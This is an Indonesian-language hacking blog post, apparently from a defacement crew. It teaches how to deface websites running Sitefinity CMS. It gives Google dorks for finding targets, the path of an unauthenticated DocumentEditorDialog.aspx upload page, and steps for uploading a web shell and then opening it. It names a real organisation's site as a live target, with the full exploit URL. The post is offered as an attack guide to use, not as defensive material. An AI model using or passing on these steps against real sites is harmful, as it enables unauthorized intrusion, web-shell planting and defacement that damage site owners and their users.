Deface Dengan Metode CMS Sitefinity Editor Dialogs+Shell Upload

Hai plennn....Balik lagi sama ane :v Hari ini gw bakal kasih tutor lagi ea. Kali ini ane bakal kasih tutor cara depes Dengan Metode CMS Sitefinity Editor Dialogs+Shell Upload. Simak eak :V

Bancol dulu ea :
Dork : --> inurl:"/Sitefinity/login.aspx"
            --> "UserControls/Dialogs"
            --> "Sitefinity: Login"
           Kembangin ea viar crotz >.<
Exploit nya : /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
Shell bekdor. Belum punya download di sini
Kesabaran :V

Tutornya :
1. Dorking di gugel pakek dork di atas. Pilih salah satu target ea. Live target http://www.calstart.org/ :v

2. Masukin exploit /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx. Misal
http://www.calstart.org/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx :v

3. Bakal muncul kek gini. Upload aja shell kesayangan u

4. Sukses? Muncul kayak gini. Akses? site.co.li/Files/namashelllu.aspx

5. Taraaaaaaa sukses dah. Tinggal di gangbang :v

Thank yak :v Kalau ada salah atau kurang mohan maap yak :v
Sekian dari ane ^.^

Blood Tears No Team Squad

Search This Blog

Deface Dengan Metode CMS Sitefinity Editor Dialogs+Shell Upload

Labels

Comments

Post a Comment